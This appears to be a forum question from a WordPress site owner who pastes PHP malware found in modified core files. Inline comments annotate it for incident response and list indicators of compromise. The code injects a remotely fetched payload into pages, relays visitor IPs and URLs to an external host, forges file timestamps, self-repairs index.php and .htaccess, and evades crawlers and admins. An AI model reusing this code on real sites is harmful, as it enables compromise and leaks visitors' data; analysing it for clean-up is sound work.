Wordpress files have been modified - What is the impact

I have the Wordfence plugin installed on all the WordPress sites that I host on shared hosting. I occasionally get messages that people are attempting to compromise the passwords. For that reason the usernames are non-standard (e.g. not 'admin') and the passwords are complex. It also emails me whenever an admin logs in.

This morning I got an email saying that core files had been modified.

Here is the code that was added:

// Analyst note: this is the attacker's code exactly as pasted by the site
// owner; the leading "fu" of "function" was lost in the paste, so this first
// line does not parse as shown. The annotations below describe what the code
// does for incident-response purposes.
//
// my_time(): chooses a modification timestamp to forge. It collects the mtime
// of every wp-*.php file in $dir and returns the mtime value shared by the
// largest number of those files, so that a later touch() makes the rewritten
// file look as old as the genuine core files (presumably to evade
// "recently modified" checks; it does nothing against hash-based checks).
nction my_time($dir) {
 	    foreach (glob($dir . '/wp-*.php') as $f) {
 	  	       $times[] = filemtime($f);   // $times is never initialised: undefined if glob() matched nothing
 	  	}
 	  	$max = 1;
 	  	// Pairwise scan for the most frequent mtime. If every mtime is unique
 	  	// $time is never assigned and the function returns null.
 	  	for ($i = 0; $i < count($times) - 1; $i++) {
 	  	$k = 1;
 	  	for ($j = $i + 1; $j < count($times); $j++) {
 	  	if ($times[$i] == $times[$j]) {
 	  	$k++;
 	  	if ($k > $max) {
 	  	$max = $k;
 	  	$time = $times[$i];
 	  	}
 	  	}
 	  	}
 	  	}
 	  	return $time;
 	  	}
 	  	
 	  	// my_correct(): the persistence / self-repair routine. Whenever index.php
 	  	// or .htaccess in $dir differs from the attacker's stored copy it is
 	  	// overwritten, made read-only (0444) and back-dated with my_time(), so a
 	  	// manual clean-up of either file is silently undone on the next request
 	  	// that loads this file. Both files must be restored together with the
 	  	// loader that includes this code, otherwise they will be re-infected.
 	  	function my_correct($dir) {
 	  	$time = 0;
 	  	$path = $dir . '/index.php';
 	  	// The base64 body was stripped from this paste. Presumably it is the
 	  	// attacker's replacement index.php (the loader that includes this file)
 	  	// — confirm against the copy recovered from the compromised host.
 	  	$content = base64_decode('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');
 	  	if (file_get_contents($path) != $content) {
 	  	chmod($path, 0644);   // make writable, overwrite, then lock read-only
 	  	file_put_contents($path, $content);
 	  	chmod($path, 0444);
 	  	$time = my_time($dir);   // forge the mtime to match the core files
 	  	touch($path, $time);
 	  	}
 	  	
 	  	$path = $dir . '/.htaccess';
 	  	// This literal decodes to the stock "# BEGIN WordPress ... # END WordPress"
 	  	// mod_rewrite block (RewriteBase /, non-file/non-dir requests -> /index.php).
 	  	// Resetting .htaccess to it guarantees all page requests go through the
 	  	// replaced index.php above.
 	  	$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
 	  	// Only rewrites an existing .htaccess; it never creates one.
 	  	if (file_exists($path) AND file_get_contents($path) != $content) {
 	  	chmod($path, 0644);
 	  	file_put_contents($path, $content);
 	  	chmod($path, 0444);
 	  	if (!$time) {
 	  	$time = my_time($dir);
 	  	}
 	  	touch($path, $time);
 	  	}
 	  	}
 	  	
 	  	// Runs on every include of this file, before any page output: repairs
 	  	// index.php and .htaccess one directory above this file (the wp-*.php glob
 	  	// in my_time() suggests that is the WordPress root). Useful indicator on
 	  	// the filesystem: index.php / .htaccess with mode 0444 and an mtime equal
 	  	// to that of the core wp-*.php files.
 	  	my_correct(dirname(__FILE__) . '/..');
 	  	
 	  	// request_url_data(): outbound HTTP GET used for the payload download and
 	  	// the operator self-test. It relays the current visitor's IP address (as
 	  	// X-Forwarded-For), User-Agent and the page URL being served (as Referer)
 	  	// to the remote host — presumably so the server side can tailor or
 	  	// withhold the payload per visitor — which also means every injected
 	  	// page view leaks visitor data off-site. Returns the response body.
 	  	function request_url_data($url) {
 	  	// Rebuilds the URL of the page being served; REQUEST_URI is normally a
 	  	// bare path, so the http:// + HTTP_HOST branch is the usual result.
 	  	$site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
 	  	if (function_exists('curl_init')) {
 	  	$ch = curl_init();
 	  	curl_setopt($ch, CURLOPT_TIMEOUT, 5);   // short timeouts keep the added page latency small
 	  	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
 	  	curl_setopt($ch, CURLOPT_URL, $url);
 	  	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 	  	curl_setopt($ch, CURLOPT_HTTPHEADER, array(
 	  	'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
 	  	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
 	  	'Referer: ' . $site_url,
 	  	));
 	  	$response = trim(curl_exec($ch));
 	  	} elseif (function_exists('fsockopen')) {
 	  	// Raw-socket fallback: always port 80 and HTTP/1.0, with a proxy-style
 	  	// absolute request line. The same visitor headers are sent here too.
 	  	$m = parse_url($url);
 	  	if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
 	  	fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
 	  	'Host: ' . $m['host'] . "\r\n" .
 	  	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
 	  	'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
 	  	'Referer: ' . $site_url . "\r\n" .
 	  	'Connection: Close' . "\r\n\r\n");
 	  	$response = '';
 	  	while (!feof($fp)) {
 	  	$response .= fgets($fp, 1024);
 	  	}
 	  	list($headers, $response) = explode("\r\n\r\n", $response);   // drop the header block, keep the body
 	  	fclose($fp);
 	  	}
 	  	// If fsockopen() fails, $response is never set and null is returned.
 	  	} else {
 	  	// Plain text, not base64: the caller's strict base64_decode() rejects it,
 	  	// so no injection happens on hosts without curl or fsockopen.
 	  	$response = 'curl_init and fsockopen disabled';
 	  	}
 	  	return $response;
 	  	}
 	  	
 	  	error_reporting(0);   // suppress notices/warnings so the injection never surfaces PHP errors on the page
 	  	// Dead store: assigned and immediately unset. The same 32-hex-character
 	  	// value is the access key compared against $_GET['check'] in
 	  	// add_2footer(), so it is a usable file-content signature for this strain.
 	  	$_passssword = '98b18acce3ce2362c1ae9afb8b28490f';
 	  	unset($_passssword);
 	  	
 	  	// Only active when loaded inside WordPress: wp_head starts an output
 	  	// buffer and wp_footer rewrites and flushes it (add_2head / add_2footer).
 	  	if (function_exists("add_action")) {
 	  	add_action('wp_head', 'add_2action' === '' ? '' : 'add_2head');
 	  	add_action('wp_footer', 'add_2footer');
 	  	}
 	  	
 	  	// add_2head(): wp_head hook. Starts an output buffer so that everything
 	  	// WordPress renders from <head> onward is captured and can be rewritten
 	  	// by add_2footer() before it reaches the visitor.
 	  	function add_2head() {
 	  	ob_start();
 	  	}
 	  	
 	  	// add_2footer(): the injection itself, run at the wp_footer hook. It takes
 	  	// the HTML buffered since wp_head, fetches a remote payload and splices it
 	  	// in directly after the <body> tag, behind several filters that keep the
 	  	// payload away from crawlers, the site administrator and repeat visitors.
 	  	// Impact for the site owner: ordinary visitors receive attacker-controlled
 	  	// HTML/JS chosen by the remote host at request time, and each such request
 	  	// reports the visitor's IP, User-Agent and page URL to that host.
 	  	function add_2footer() {
 	  	$check = false;
 	  	$check_data = "";
 	  	// Operator self-test: ?check=<key> appends an HTML comment holding the
 	  	// first 100 bytes of a fetch from bootstrapcdn, proving outbound HTTP
 	  	// works from this host. The "check" query key in access logs and the
 	  	// "checker_start" marker in responses are both indicators of this strain.
 	  	if (!empty($_GET['check']) AND $_GET['check'] == '98b18acce3ce2362c1ae9afb8b28490f') {
 	  	$check = true;
 	  	$check_data = ('<!--checker_start ');
 	  	$check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
 	  	$check_data .= (' checker_end-->');
 	  	}
 	  	
 	  	if (!$check) {
 	  	// Evasion filters (ordinary visitors only): serve a clean page to
 	  	// requests with no User-Agent, to client IPs beginning "74.125"
 	  	// (presumably a crawler address range) and to common crawler UAs, so the
 	  	// payload stays out of search-engine caches and scanner results.
 	  	if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
 	  	return;
 	  	
 	  	// One shot per browser: the script injected below sets this cookie, so
 	  	// a reload shows a clean page. The cookie name is a reliable indicator of
 	  	// this infection in browser, proxy and WAF logs.
 	  	$cookie_name = 'PHP_SESSION_PHP';
 	  	if (isset($_COOKIE[$cookie_name]))
 	  	return;
 	  	
 	  	// Leave static assets, AJAX, cron, the login page, wp-admin /
 	  	// wp-includes / wp-content, phpMyAdmin, XML-RPC and feeds untouched, so
 	  	// the owner's own admin sessions and tooling never see the payload.
 	  	foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
 	  	if (preg_match($regex, $_SERVER['REQUEST_URI']))
 	  	return;
 	  	}
 	  	}
 	  	
 	  	$buffer = ob_get_clean();   // page HTML captured since wp_head
 	  	ob_start();
 	  	$regexp = '/<body[^>]*>/is';
 	  	if (preg_match($regexp, $buffer, $m)) {
 	  	$body = $m[0];
 	  	// Decodes to a plain http:// URL on an external host — reading the
 	  	// literal gives http://nikaragua.slyip.com/blog/?... (decode it yourself
 	  	// to confirm before using the hostname as a block-list / IoC entry).
 	  	// The response is expected to be a base64-encoded HTML/JS fragment.
 	  	$url = base64_decode('aHR0cDovL25pa2FyYWd1YS5zbHlpcC5jb20vYmxvZy8/YmY0eiZ1dG1fc291cmNlPTIwOTI0OjE0NTEyNToyNDA=');
 	  	//       if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
 	  	// Strict base64 decode: any non-base64 reply (error text, HTML) is
 	  	// silently ignored and the page is served unmodified.
 	  	if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
 	  	// Sets the suppression cookie for 7 days (60*60*24*7 s, expressed in ms)
 	  	// with a random value, then appends the remote payload verbatim. Note
 	  	// $cookie_name is only assigned in the !$check branch above, so on a
 	  	// self-test request the cookie name written here is empty.
 	  	$body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
 	  	//           $body .= base64_decode($m[0]);
 	  	$body .= $decoded;
 	  	//           $body .= base64_decode($m[0]);
 	  	}
 	  	$body .= $check_data;
 	  	
 	  	// Each <body ...> tag is replaced by itself plus the injected content.
 	  	$buffer = preg_replace($regexp, $body, $buffer);
 	  	}
 	  	echo $buffer;
 	  	ob_flush();
 	  	}//iend



Can anyone offer some assistance in working out what the impact of this is on my sites?

I updated the plugins across all sites on Friday, so I am unsure how I have been compromised.

Whilst I have restored the files, I need to know if there is anything else I need to do.

Thanks
Sorry, can you advise how I can re-mark?